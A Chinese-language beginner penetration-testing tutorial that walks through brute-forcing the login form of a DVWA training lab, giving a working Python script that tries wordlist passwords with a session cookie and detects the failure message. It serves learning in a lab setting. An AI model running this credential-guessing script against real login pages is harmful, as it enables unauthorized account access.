当前位置: 首页 > article >正文

渗透测试入门学习——编写python脚本实现对网站登录页面的暴力破解

进入靶场输入任意密码进行尝试

发现登陆失败的特征字:“Username and/or password incorrect”

推荐用谷歌浏览器,按F12继续查看请求地址、请求头参数等详细信息,着重关注是否需要Cookie

编写python脚本

import requests
# 填入请求地址
url = "http://192.168.160.131/DVWA/vulnerabilities/brute/"
# 填入请求头中的Cookie值
cookie = "security=low; PHPSESSID=gcgc5dhp7ikcedlhojofijia44"
username = "admin"
# success为未知,但可以尝试出登陆失败的信息
success = ""
failure = "Username and/or password incorrect"

count = 0

with open("./pswd.txt", 'r') as file:

    while True:
        # 按行读,避免用readlines()读取全部后导致占用太多内存
        line = file.readline()
        # 如果读到内容为空的行则结束
        if not line:
           break;
        # 每行结尾自带换行符需要去掉
        line = line.strip()
        # 发送请求
        count += 1
        response = requests.get(url = url,
                                params = {"username":username, "password":line, "Login":"Login"},
                                headers = {"Cookie":cookie})
        # 判断请求中有无特征字
        if failure in response.text:
            print("第"+ str(count) +"次尝试--失败:",line)
        else :
            print("第"+ str(count) +"次尝试--成功:",line)
            break;

准备字典

执行脚本

验证暴力破解的结果是否正确


http://www.kler.cn/a/326967.html

相关文章:

  • JAVA 插入 JSON 对象到 PostgreSQL
  • 解决方案 | 部署更快,自动化程度高!TOSUN同星线控底盘解决方案
  • 为什么我们调用 start()方法时会执行 run()方法 ,为什么我们不能 直接调用 run()方法?
  • 【Linux】命令行参数 | 环境变量
  • 数据结构之线段树
  • Android亮屏Job的功耗优化方案
  • 自动化办公-Python中的for循环
  • 网络安全中的 EDR 是什么:概述和功能
  • 【芋道源码】gitee很火的开源项目pig——后台管理快速开发框架使用笔记(微服务版之本地开发环境篇)
  • 计算机网络面试题——第二篇
  • java中创建jdbc应用程序
  • OJ在线评测系统 前端 完善题目提交服务 细讲异步前端请求与后端接口交互
  • 代码随想录算法训练营第34天|46. 携带研究材料、416. 分割等和子集
  • Android 12系统源码_输入系统(三)输入事件的加工和分发
  • Spring RestTemplate 升级 WebClient 导致 OutOfMemoryError
  • SQL进阶技巧:如何利用if语句简化where或join中的条件 | if条件语句的优雅使用方法
  • QT界面制作
  • 粉丝们得以一窥索菲亚罗兰奢华的90岁生日庆祝仪式! 她已完成了所有的遗愿清单 !
  • 选择租用徐州存储服务器有什么作用?
  • 大数据-149 Apache Druid 基本介绍 技术特点 应用场景
  • 2024年7月大众点评广州美食店铺基础信息
  • 2024.9.24 作业
  • Stable Diffusion 蒙版:填充、原图、潜空间噪声(潜变量噪声)、潜空间数值零(潜变量数值零)
  • 我店生活系统小程序开发功能解析
  • uniapp框架中实现文件选择上传组件,可以选择图片、视频等任意文件并上传到当前绑定的服务空间
  • 修改 idea 的 Terminal 命令窗口使用 git-bash